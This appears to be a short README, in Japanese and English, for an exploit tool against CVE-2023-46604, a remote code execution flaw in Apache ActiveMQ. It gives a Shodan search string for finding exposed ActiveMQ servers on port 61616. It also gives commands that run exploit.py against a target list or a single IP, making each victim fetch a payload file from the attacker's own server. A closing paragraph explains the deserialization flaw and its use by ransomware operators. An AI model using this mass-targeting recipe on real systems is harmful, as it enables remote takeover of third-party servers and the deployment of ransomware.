
CVE-2023-46604 用エクスプロイト
CVE-2023-46604 用エクスプロイト
product:"ActiveMQ" port:"61616"
for read targets from the file:
python3 exploit.py -f targets -c http://YourVPS/poc.xml
---
single target:
python3 exploit.py -ip IP -c http://YourVPS/poc.xml
CVE-2023-46604 は、オープンソースのメッセージブローカーソフトウェアである Apache ActiveMQ における重大なリモートコード実行の脆弱性です。この脆弱性により、ネットワークアクセスを持つリモートの攻撃者が、Java ベースの OpenWire ブローカーまたはクライアントのいずれかに対して任意のシェルコマンドを実行できるようになります。これは、OpenWire プロトコル内のシリアライズされたクラスタイプを操作し、ブローカーにクラスパス上の任意のクラスをインスタンス化させることで達成されます。この脆弱性は Apache ActiveMQ 内の安全でないデシリアライゼーションに起因し、HelloKitty ランサムウェアファミリーを含む攻撃者によって、ランサムウェアバイナリを実行してシステムを完全に侵害するために悪用されてきました。